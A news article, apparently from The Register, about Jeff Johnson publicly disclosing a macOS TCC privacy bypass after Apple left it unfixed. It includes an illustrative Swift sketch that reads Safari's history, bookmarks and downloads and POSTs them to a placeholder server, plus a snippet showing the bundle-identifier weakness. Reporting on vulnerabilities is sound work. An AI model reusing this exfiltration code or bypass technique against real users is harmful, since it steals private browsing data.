After Six Months Of Stonewalling By Apple, App Dev Goes Public With macOS Privacy Protection Bypass
Six months after software developer Jeff Johnson told Apple about a privacy bypass vulnerability opening up protected files in macOS Mojave, macOS Catalina, and the upcoming macOS Big Sur, the bug remains unfixed – so he’s going public.
Johnson, who runs app developer Lapcat Software, said he submitted details about the problem to Apple’s Security Bounty program on the day it opened for business, December 19, 2019. The problem appears to be with Apple’s Transparency, Consent, and Control sandboxing system.
Essentially, naughty apps can exploit the bug to access protected files, such as your browser history, that should be off limits.
In a blog post on Tuesday, he explained that after asking Apple for a status update in January this year, again in April, and once more in June – and being told each time that the iGiant was still investigating – he decided to disclose his findings in an effort to push back against the tech titan's boasts about security and privacy.
“For technical reasons, I don’t believe that the issue will be fixed by Apple before Big Sur is released to the public in the Fall,” he wrote. “I’ve seen no evidence that Big Sur makes any effort in this direction, and Apple’s email to me shows no evidence of that either. Therefore, I’m disclosing the issue now.”
He revealed a similar issue last October after reporting it to Apple in February of that year and waiting eight months, in vain, for a fix.
Mutiny on the Bounty
In his post, Johnson expressed dissatisfaction with the Apple Security Bounty program, calling the experience a disappointment and saying he doesn't intend to participate in the future.
“Talking to Apple Product Security is like talking to a brick wall,” he said in an email to The Register. “I suspect that Apple doesn’t trust outsiders with any information, but this attitude is counterproductive, because it just alienates the people who report bugs, and turns them away from bug reporting. Distrust from one side causes distrust from the other side too.”
This latest bug can be exploited by a maliciously crafted app to bypass a privacy system known as Transparency, Consent, and Control (TCC) that was introduced in OS X Mavericks and got strengthened in subsequent releases through technologies like System Integrity Protection (SIP) in El Capitan (the branding transition from Mac OS X to macOS didn’t happen until mid-2016).
Starting in 2018, with macOS Mojave, TCC expanded to require apps to get special permission to run AppleScript, and that’s when, Johnson says, developers really took notice of it.
TCC is a sandboxing system designed to enforce users' privacy decisions, such as approving or denying an app's access to location data or to files like the contacts database. What Johnson discovered is a way for unauthorized apps to get at protected files anyway.
His proof-of-concept code demonstrates how a user-installed macOS app can access files that should be protected by TCC – specifically those in the ~/Library/Safari directory – and then post the data to a remote server. The files stored in that directory include bookmarks, browser history, downloads, and other data related to browsing sessions. If another app were targeted, the bypass would provide access to that app's protected files instead.
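To make the stakes concrete, here is a minimal, hypothetical Swift sketch of the exfiltration step such an app could perform once TCC is out of the way. It is not Johnson's proof of concept: the file names are merely typical Safari data files, the upload URL is a placeholder, and the code assumes the TCC bypass has already happened.

```swift
import Foundation

// Illustrative sketch only: the exfiltration half of a PoC of this kind,
// assuming TCC has already been bypassed. File names and the upload URL
// are placeholders, not details from Johnson's disclosure.
let safariDir = FileManager.default
    .homeDirectoryForCurrentUser
    .appendingPathComponent("Library/Safari")

// Files in ~/Library/Safari that TCC is supposed to keep off limits.
let targets = ["Bookmarks.plist", "History.db", "Downloads.plist"]

for name in targets {
    let fileURL = safariDir.appendingPathComponent(name)
    guard let data = try? Data(contentsOf: fileURL) else {
        // Without a working bypass, reads here fail with a permission error.
        print("blocked or missing: \(name)")
        continue
    }

    // POST the contents to a hypothetical attacker-controlled server.
    var request = URLRequest(url: URL(string: "https://example.com/upload?file=\(name)")!)
    request.httpMethod = "POST"
    request.httpBody = data
    URLSession.shared.dataTask(with: request).resume()
}

// Keep the process alive long enough for the uploads to finish (sketch only).
RunLoop.main.run(until: Date().addingTimeInterval(5))
```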
The bypass is made possible by two flaws. First, the exceptions to TCC's blocking – recorded in the database ~/Library/Application Support/com.apple.TCC/TCC.db
– are keyed on an app's bundle identifier rather than its path on disk, so an app at another location carrying a copy of that identifier gets treated as the original, authorized app. Second, TCC's code signature check is not very thorough and doesn't spot modified resources, because running a deep check of an app and all of its resource files can take a long time.
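For flavour, here's a tiny Swift illustration of why keying on the bundle identifier alone is fragile: a copy of an app bundle at a different path still reports the same identifier, so a lookup that ignores the path – and skips a thorough signature check – can't tell the copy apart from the real thing. The paths and the choice of Safari as the example app are illustrative, not taken from Johnson's write-up.

```swift
import Foundation

// Hypothetical illustration of the first flaw: bundle identifiers don't change
// when a bundle is copied, so TCC.db entries keyed on the identifier alone
// can't distinguish the genuine app from a copy sitting somewhere else.
let originalPath = "/Applications/Safari.app"               // example app
let copiedPath = NSTemporaryDirectory() + "Safari copy.app" // arbitrary location

try? FileManager.default.copyItem(atPath: originalPath, toPath: copiedPath)

for path in [originalPath, copiedPath] {
    if let bundleID = Bundle(path: path)?.bundleIdentifier {
        // Both bundles report the same identifier, which is all a
        // path-agnostic lookup would see.
        print("\(path) -> \(bundleID)")
    }
}
```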
Johnson acknowledged that a privacy flaw leaking data is not particularly serious as far as such bugs go, but maintained it’s not something that should be ignored.
“If you believe that macOS privacy protections are important, then yes, this is a very serious issue,” he said via email.
“On the other hand, if you were very satisfied with the level of macOS system security that existed prior to 2018, then no, you might not care about this much. In either case, though, it’s a serious design flaw in the privacy protections system.”
Johnson said he chose to write about the flaw because he feels Apple's increasing use of restrictive privacy systems limits what legitimate developers can do without actually hindering those intent on building malware.
“My personal opinion is that macOS privacy protections are mainly security theater and only harm legitimate Mac developers while allowing malware apps to bypass them through many existing holes such as the one I’m disclosing, and that other security researchers have also found,” Johnson wrote.
Apple did not respond to a request for comment. ®